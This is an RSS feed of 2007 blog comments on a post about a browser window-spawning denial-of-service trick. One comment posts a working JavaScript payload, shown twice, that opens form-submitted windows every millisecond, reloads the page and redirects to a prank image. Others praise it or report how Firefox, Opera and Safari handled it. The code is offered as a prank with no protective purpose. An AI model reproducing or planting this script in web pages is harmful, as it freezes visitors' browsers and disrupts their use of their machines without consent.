<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Browser window spawning DOS</title>
	<atom:link href="http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/</link>
	<description>A tool for designers dealing with programmers dealing with designers...</description>
	<pubDate>Thu, 20 Nov 2008 22:13:41 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
		<item>
		<title>By: crit3rion</title>
		<link>http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-960</link>
		<dc:creator>crit3rion</dc:creator>
		<pubDate>Fri, 30 Nov 2007 18:28:22 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-960</guid>
		<description>Great code!  Let's make it pretty :-)

(It works really well in IE and ies4linux)

&#60;script type="text/javascript"&#62;
window.onload = function() {
        setInterval('spawn()',1);
}
function spawn() {
        frm = document.location='http://misers.org/pictures/SomethingAwful/samakeyoulaugh/stallowned.jpg'
        frm = document.createElement('form');
        frm.target = 'x' + Math.round(Math.random() * 1);
        frm.method = 'GET';
        frm.action = '?';
        document.body.appendChild(frm);
        frm.submit();
        self.location.reload();
}
&#60;/script&#62;</description>
		<content:encoded><![CDATA[<p>Great code!  Let&#8217;s make it pretty <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>(It works really well in IE and ies4linux)</p>
<p>&lt;script type=&#8221;text/javascript&#8221;&gt;<br />
window.onload = function() {<br />
        setInterval(&#8217;spawn()&#8217;,1);<br />
}<br />
function spawn() {<br />
        frm = document.location=&#8217;http://misers.org/pictures/SomethingAwful/samakeyoulaugh/stallowned.jpg&#8217;<br />
        frm = document.createElement(&#8217;form&#8217;);<br />
        frm.target = &#8216;x&#8217; + Math.round(Math.random() * 1);<br />
        frm.method = &#8216;GET&#8217;;<br />
        frm.action = &#8216;?&#8217;;<br />
        document.body.appendChild(frm);<br />
        frm.submit();<br />
        self.location.reload();<br />
}<br />
&lt;/script&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Mr. T</title>
		<link>http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-948</link>
		<dc:creator>Mr. T</dc:creator>
		<pubDate>Thu, 29 Nov 2007 02:03:16 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-948</guid>
		<description>Evil. Pure evil.  :) Ingenius.</description>
		<content:encoded><![CDATA[<p>Evil. Pure evil.  <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Ingenius.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-947</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Wed, 28 Nov 2007 21:54:09 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-947</guid>
		<description>Yeah Safari is the only one that seems to have trouble with it, but with a little hacking maybe the others can also be affected.</description>
		<content:encoded><![CDATA[<p>Yeah Safari is the only one that seems to have trouble with it, but with a little hacking maybe the others can also be affected.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: xjf</title>
		<link>http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-946</link>
		<dc:creator>xjf</dc:creator>
		<pubDate>Wed, 28 Nov 2007 19:44:21 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-946</guid>
		<description>In my Opera 9.24 it opens a lot of tabs but with Shit+Ctrl+Alt+W you can close most of them and then quickly go like (Site Preferences Disable Javascript). And that's it.</description>
		<content:encoded><![CDATA[<p>In my Opera 9.24 it opens a lot of tabs but with Shit+Ctrl+Alt+W you can close most of them and then quickly go like (Site Preferences Disable Javascript). And that&#8217;s it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: gregf</title>
		<link>http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-945</link>
		<dc:creator>gregf</dc:creator>
		<pubDate>Wed, 28 Nov 2007 16:56:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/28/browser-window-spawning-dos/#comment-945</guid>
		<description>I just gave it a shot in Firefox. It loaded three rows of tabs then the popup blocker kicked in, and stopped the rest. Everything remained functional.</description>
		<content:encoded><![CDATA[<p>I just gave it a shot in Firefox. It loaded three rows of tabs then the popup blocker kicked in, and stopped the rest. Everything remained functional.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
